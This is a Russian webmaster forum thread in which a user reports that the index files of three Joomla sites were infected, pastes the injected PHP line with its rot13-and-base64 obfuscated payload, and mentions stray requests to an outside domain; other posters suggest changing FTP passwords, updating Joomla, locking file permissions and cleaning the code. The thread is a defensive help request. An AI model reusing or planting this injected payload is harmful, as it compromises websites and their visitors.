- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
у меня заразились все 3 сайта на аккаунте хостинга. во все индексные внедрился код в первую строку
$somecrainsignvar="ny2fmed8"; echo base64_decode(str_rot13('VQkmL3WcpUD+VN0XqzSlVTquFaAVo3A0VQ0tXPtvnUE0pQbvVQ09VTEiL3IgMJ50YzkiL2S0nJ9hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMT
I4VvN6VPWbqUEjBv8irJShMTI4Vvx7VTEiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp3WwCFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJM5YKLkC2yxCFVeGJS0nP5zoT9ipvuALKEbYaWuozEioFtcVP
bmZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIlCFEeMKy3o3WxWaAyCFEmMFM1pw0kWxuHISOsHxITEIWSHw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2
A1oJIhqP5IHxjcXlVzMTIzLKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2AlnKO0WlHmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==')); $crain="";
И файрбаг показывает какието левые запросы к сайту yandex-yandex.uni.cc
Достаточно ли будет вычистить этот код из файлов?
Как этот вирус внедрился?
Движки сайтов - джумлы.
Смените пароль ftp, и обновите joomla до последней версии.
Смените пароль ftp, и обновите joomla до последней версии.
ftp сменила уже, но мне кажется не в этом дело, т.к. все пароли фтп у меня в одной проге хранятся, там еще 10 паролей, на другие хостинги, но туда вирус не пролез.
С версией джумлы сложно, один сайт на старом движке 1.0.15
Читала через htaccess можно запретить всякие изменения в папках. Поможет ли?
стучите поможем
http://www.google.ru/search?q=Joomla+%D0%B2%D0%B8%D1%80%D1%83%D1%81
сделай пхп-файл со следующим содержимым и запусти его.
Не забудь путь к директории с сайтами изменить у $dirname
Скрипт ищет пхп-файлы, где есть строки, начинающиеся на $somecrainsignvar и удаляет все что начинается с этого слова и до конца строки.
Читала через htaccess можно запретить всякие изменения в папках
- залейте для начала .ftpaccess
и подключайтесь только через ssh(2)
- на все индексные файлы поставьте права 444
- в htaccess впишите бан по ip для выявленых Вами адресов:
- это только для начала..)
Попробуйте просканировать Ваш сайт с помощью http://find-xss.net/
Я у себя нашел кучу дыр в безопасности. Думаю, Вам поможет
smart2011 спасибо за ссылку, действительно полезная вещь.